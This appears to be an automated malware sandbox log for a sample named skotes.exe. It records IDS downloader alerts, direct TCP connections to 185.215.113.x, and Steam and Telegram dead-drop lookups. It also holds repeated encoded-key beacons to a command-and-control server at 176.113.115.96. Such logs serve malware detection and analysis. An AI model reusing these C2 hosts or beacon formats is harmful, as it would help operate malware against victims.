Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:59907 -> 176.113.115.96:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:59911 -> 176.113.115.96:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:59978 -> 176.113.115.96:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:59985 -> 176.113.115.96:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:59969 -> 176.113.115.96:443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.39

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_0061BE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,

6_2_0061BE30

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /sc1phell HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: fizzysu.sbsConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38f926d19fe6595cd66946851e91fcd85241ab258d81329326be8ef43a8f51f8a95b5cc212a91f954db94e545d5d29f43faeaa5960502d18f414ad332231ad4398cd5d59154 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38c926d19fe6595cd66946951e91fcd852109ed1bd405672e26e5fd09b4a145c9c4e9976278d7f1449ad5f64ac9d0815caeb6f4d75e5f9681081fc86a604dde318bd7d59d5d49ce753d HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /sc1phell HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=41c4cebe1dd92a24a1_11141984053211476619
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: fizzysu.sbsConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38d926d19fe6595cd66946951e91fcd852109ed1bd405672e26e5fd09b4a145c9c4e9976278d7f1449ad5f64ac9d0815caeb6f4d75e5f9681081fc86a604dde318bd7d59d5d49ce753d HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38a926d19fe6595cd66946951e91fcd852109ed1bd405672e26e5fd09b4a145c9c4e9976278d7f1449ad5f64ac9d0815caeb6f4d75e5f9681081fc86a604dde318bd7d59d5d49ce753d HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38b926d19fe6595cd66946951e91fcd852109ed1bd405672e26e5fd09b4a145c9c4e9976278d7f1449ad5f64ac9d0815caeb6f4d75e5f9681081fc86a604dde318bd7d59d5d49ce753d HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb388926d19fe6595cd66946951e91fcd852109ed1bd405672e26e5fd09b4a145c9c4e9976278d7f1449ad5f64ac9d0815caeb6f4d75e5f9681081fc86a604dde318bd7d59d5d49ce753d HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb389926d19fe6595cd66946951e91fcd852109ed1bd405672e26e5fd09b4a145c9c4e9976278d7f1449ad5f64ac9d0815caeb6f4d75e5f9681081fc86a604dde318bd7d59d5d49ce753d HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb386926d19fe6595cd66946951e91fcd852109ed1bd405672e26e5fd09b4a145c9c4e9976278d7f1449ad5f64ac9d0815caeb6f4d75e5f9681081fc86a604dde318bd7d59d5d49ce753d HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb387926d19fe6595cd66946951e91fcd852109ed1bd405672e26e5fd09b4a145c9c4e9976278d7f1449ad5f64ac9d0815caeb6f4d75e5f9681081fc86a604dde318bd7d59d5d49ce753d HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38f842a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38f852a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38f862a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38f872a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38f802a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38f812a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38f822a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38f832a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38f8c2a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38f8d2a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38c842a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38c852a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38c862a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38c872a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38c802a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38c812a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38c822a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38c832a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38c8c2a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38c8d2a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38d842a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38d852a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38d862a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38d872a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38d802a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38d812a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38d822a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38d832a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38d8c2a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38d8d2a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38a842a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38a852a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38a862a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38a872a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38a802a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38a812a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38a822a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38a832a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38a8c2a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
Source: global traffic	HTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231678fbb38a8d2a1cec7a86d87bdb6546ad12dac02909ef1fd61229366be8eb43a8ec4cdb8eec906920dff157d3c9b841d1cc9d4ba5b4f4c11e559b875213df257d5d873d8dd3d1935448c87731f0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
